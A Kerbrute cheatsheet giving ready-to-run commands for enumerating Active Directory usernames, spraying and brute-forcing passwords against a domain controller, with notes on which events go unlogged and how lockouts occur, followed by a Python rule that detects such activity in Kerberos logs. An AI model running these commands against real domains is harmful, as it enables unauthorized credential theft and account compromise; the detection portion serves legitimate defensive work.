Kerbrute Cheatsheet

Fast Kerberos pre-authentication brute-forcer for username enumeration and password spraying.

  • GitHub: https://github.com/ropnop/kerbrute
  • Does not generate event ID 4625 (logon failure) during username enumeration
  • Generates event ID 4768 (TGT request) if Kerberos logging is enabled
  • Username enumeration does not cause account lockouts
  • Password spraying does count toward lockout thresholds

Basic Syntax

kerbrute <command> [flags]

Commands

Command         Description
userenum        Enumerate valid AD usernames via Kerberos
passwordspray   Spray a single password against a list of users
bruteuser       Brute-force a single user’s password
bruteforce      Brute-force using user:password combo list

Global Flags

Flag          Description
-d DOMAIN     Domain to authenticate against (required)
--dc IP       Domain Controller IP or hostname
-t THREADS    Number of threads (default: 10)
-o FILE       Output file for results
--safe        Safe mode: abort if any account is locked out
--downgrade   Downgrade to ARCFOUR-HMAC-MD5 encryption
-v            Verbose output

Username Enumeration

Enumerate Valid Users from Wordlist

kerbrute userenum -d domain.local --dc 172.16.5.5 /path/to/userlist.txt

With Output File

kerbrute userenum -d domain.local --dc 172.16.5.5 -o valid_users.txt /path/to/userlist.txt

How it works: Kerbrute sends an AS-REQ without pre-authentication data. If the KDC responds with PRINCIPAL UNKNOWN, the user doesn’t exist. If it responds that pre-authentication is required, the user is valid.


Password Spraying

Spray Single Password

kerbrute passwordspray -d domain.local --dc 172.16.5.5 valid_users.txt 'Welcome1'

Safe Mode (Stop on Lockout)

kerbrute passwordspray -d domain.local --dc 172.16.5.5 --safe valid_users.txt 'Welcome1'

Brute-Force Single User

kerbrute bruteuser -d domain.local --dc 172.16.5.5 /path/to/passwords.txt jsmith

Brute-Force with Combo List

File format: user:password (one per line)

kerbrute bruteforce -d domain.local --dc 172.16.5.5 combos.txt

Useful Username Wordlists

List                          Description
jsmith.txt                    48,705 flast format names
jsmith2.txt                   Extended flast list
top-usernames-shortlist.txt   Common usernames

Source: statistically-likely-usernames


Detection Notes

Action                 Event ID      Notes
Username enumeration   4768          Only if Kerberos logging enabled via Group Policy
Password spraying      4768 + 4771   Failed pre-auth counts toward lockout
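
The table above can be turned into a detection rule. The following is an added example, not part of the original cheatsheet or of Kerbrute: it flags any source IP that fails Kerberos authentication for many distinct usernames within a short window. The status codes 0x6 and 0x18 are standard Kerberos error codes not listed on this page, the 5-minute window and 5-user threshold are arbitrary assumptions, and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# (EventID, Status) pairs of interest. The status codes are standard Kerberos
# error codes, not values taken from the cheatsheet:
#   4768 + 0x6  = KDC_ERR_C_PRINCIPAL_UNKNOWN (AS-REQ for a nonexistent user)
#   4771 + 0x18 = KDC_ERR_PREAUTH_FAILED (wrong password)
SIGNALS = {(4768, 0x6): "username-enumeration", (4771, 0x18): "password-spraying"}

def detect(events, window=timedelta(minutes=5), min_users=5):
    """Return {(source_ip, label): peak count of distinct usernames that
    failed from that source inside any sliding window}, if >= min_users."""
    buckets = defaultdict(list)
    for ev in events:
        label = SIGNALS.get((int(ev["EventID"]), int(ev["Status"], 16)))
        if label is None:
            continue
        ip = ev["IpAddress"].removeprefix("::ffff:")  # DCs log IPv4-mapped form
        ts = datetime.fromisoformat(ev["TimeCreated"])
        buckets[(ip, label)].append((ts, ev["TargetUserName"].lower()))
    alerts = {}
    for key, hits in buckets.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            users = {u for _, u in hits[start:end + 1]}
            if len(users) >= min_users:
                alerts[key] = max(alerts.get(key, 0), len(users))
    return alerts

def sample_events():
    """Constructed sample data: field names follow the 4768/4771 event schema."""
    base = datetime(2024, 1, 1, 9, 0, 0)
    def ev(eid, status, user, ip, sec):
        return {"EventID": eid, "Status": status, "TargetUserName": user,
                "IpAddress": ip, "TimeCreated": (base + timedelta(seconds=sec)).isoformat()}
    evs = [ev(4768, "0x6", f"guess{i}", "::ffff:172.16.5.225", i) for i in range(8)]
    evs += [ev(4771, "0x18", f"user{i}", "::ffff:172.16.5.225", 60 + i) for i in range(6)]
    # One user mistyping a password repeatedly: many failures, one username.
    evs += [ev(4771, "0x18", "jsmith", "::ffff:172.16.5.40", 10 * i) for i in range(6)]
    # Successful TGT requests (Status 0x0) are ignored.
    evs += [ev(4768, "0x0", f"user{i}", "::ffff:172.16.5.41", i) for i in range(6)]
    return evs

if __name__ == "__main__":
    for (ip, label), n in sorted(detect(sample_events()).items()):
        print(f"{ip}: {label} ({n} distinct usernames in 5 minutes)")
```

Counting distinct usernames per source, rather than raw failures, keeps a single user retyping a wrong password from triggering the rule.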